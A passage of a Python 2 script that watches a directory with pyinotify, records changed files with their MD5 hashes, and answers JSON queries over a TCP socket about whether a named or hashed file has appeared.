 55 |       for i in range(0,len(EVENT_LIST)-EVENT_LIST_LIMITATION+1):
 56 |         EVENT_LIST.remove(EVENT_LIST[0])
 57 |       if Debug:
 58 |         print "[!] EVENT_LIST Removed - {}".format(len(EVENT_LIST))
 59 |     if os.path.isdir(event.pathname):
 60 |       pass
 61 |     else:
 62 |       try:
 63 |         with open(event.pathname, 'r') as fp:
 64 |           binary = fp.read()
 65 |           tmpList = [event.pathname,hashlib.md5(binary).hexdigest()]
 66 |         #print binary
 67 |         if tmpList not in EVENT_LIST and os.path.isfile(event.pathname):
 68 |           EVENT_LIST.append([event.pathname,hashlib.md5(binary).hexdigest()])
 69 |         if Debug:
 70 |          print "[!] Appended - ({}){}".format(hashlib.md5(binary).hexdigest(),event.pathname)
 71 |       except:
 72 |         pass
 73 |     self.mutex.release()
 74 | 
 75 | class EventCommunicator(object):
 76 |   def __init__(self,ip,port):
 77 |     self.host = ip
 78 |     self.port = port
 79 |     return
 80 |   def connWait(self):
 81 |     self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 82 |     self.server.bind((self.host,self.port))
 83 |     self.server.listen(5)
 84 |     self.conn, self.addr = self.server.accept()
 85 |   def recv(self):
 86 |     recvData = ""
 87 |     try:
 88 |       while True:
 89 |         recvDataPart = self.conn.recv(10)
 90 |         if not recvDataPart or len(recvDataPart)==0:
 91 |           break
 92 |         elif '\n' in recvDataPart:
 93 |           recvData += recvDataPart
 94 |           break
 95 |         recvData += recvDataPart
 96 |     except:
 97 |       print "Error occured during recieving command"
 98 |       return None
 99 |     if Debug:
100 |       print "[RECV] {}".format(recvData)
101 |     try:
102 |       retData = json.loads(recvData)
103 |     except:
104 |       print "Error occured during parsing recieved command"
105 |       return None
106 |     return retData
107 |   def send(self,data):
108 |     sendData = json.dumps(data)
109 |     self.conn.send(sendData+'\n')
110 |   def close(self):
111 |     self.conn.close()
112 | 
113 | def eventMonitor(path):
114 |   monitorObj = pyinotify.WatchManager()
115 |   monitorObj.add_watch(path,pyinotify.ALL_EVENTS, rec=True, auto_add=True)
116 | 
117 |   eventHandler = FileEventHandler()
118 | 
119 |   notifier = pyinotify.Notifier(monitorObj, eventHandler)
120 |   notifier.loop()
121 | 
122 | def connectionThread(connObj):
123 |   mutex = threading.Lock()
124 |   while connObj:
125 |     cmd = connObj.recv()
126 |     ret_msg = {}
127 |     try:
128 |       type_ = cmd["type"]
129 |       if type_  == 'disconn':
130 |         if mutex.test():
131 |           mutex.release()
132 |         connObj.close()
133 |         return
134 |       filename = cmd["filename"]
135 |       ext = cmd["ext"]
136 |       filehash = cmd["filehash"]
137 |       if Debug:
138 |         print "[!] Parsed - filename : {}".format(filename)
139 |         print "[!] Parsed - ext : {}".format(ext)
140 |         print "[!] Parsed - filehash : {}".format(filehash)
141 |     except:
142 |       ret_msg["msg"] = "Wrong Command..."
143 |       ret_msg["type"] = "Error"
144 |       connObj.send(json.dumps(ret_msg))
145 |       continue
146 |     mutex.acquire()
147 |     for i in EVENT_LIST:
148 |       ListedFile = i[0].split('/')[-1]
149 |       if Debug:
150 |         print "[~] Comparing.. {} - {}".format(filename, ListedFile)
151 |       if filename in ListedFile:
152 |         if ext and "{}.{}".format(filename,ext) == ListedFile:
153 |           ret_msg["msg"] = "Exactly Matched"
154 |           ret_msg["type"] = "Exist"
155 |           ret_msg["path"] = i[0]
156 |           ret_msg["hash"] = filehash
157 |           EVENT_LIST.remove(i)
158 |           break
159 |         elif not ext:
160 |           ret_msg["msg"] = "Exactly Matched"
161 |           ret_msg["type"] = "Exist"
162 |           ret_msg["path"] = i[0]
163 |           ret_msg["hash"] = filehash
164 |           EVENT_LIST.remove(i)
165 |           break
166 |       if Debug:
167 |         print "[~] Comparing.. {} - {}".format(i[1], filehash)
168 |       if i[1] == filehash:
169 |         ret_msg["msg"] = "Exactly Matched"
170 |         ret_msg["type"] = "Exist"
171 |         ret_msg["path"] = i[0]
172 |         ret_msg["hash"] = filehash
173 |         EVENT_LIST.remove(i)
174 |         break
175 |     if Debug:
176 |       if len(ret_msg.keys())!=0:
177 |         print "[~] Result : {} - {}".format(filename,ret_msg["msg"])
178 |       else:
179 |         print "[~] Result : {} - Fail".format(filename)
180 | 
181 |     mutex.release()
182 |     if len(ret_msg.keys()) == 0:
183 |       ret_msg["msg"] = "Fail to find file"
184 |       ret_msg["type"] = "Fail"
185 |     else:
186 |       if not os.path.isfile(ret_msg["path"]):
187 |         ret_msg = {}
188 |         ret_msg["msg"] = "Fail to find file"
189 |         ret_msg["type"] = "Fail"
190 |     print ret_msg
191 |     connObj.send(json.dumps(ret_msg))
192 | 
193 | if __name__ == '__main__':
194 |   # 1. run monitor thread
195 |   print "Start Event Monitor Thread"
196 |   t = threading.Thread(target = eventMonitor,args=(MONITOR_PATH,))
197 |   t.daemon = True
198 |   t.start()
199 | 
200 |   # 2. connect with client
201 |   while True:
202 |     print "Connection with client"
203 |     connObj = EventCommunicator('0.0.0.0',MONITOR_PORT)
204 |     connObj.connWait()
205 |     tc = threading.Thread(target=connectionThread, args=(connObj,))
206 |     tc.start()
207 |     tc.join()
208 | 
209 | 


--------------------------------------------------------------------------------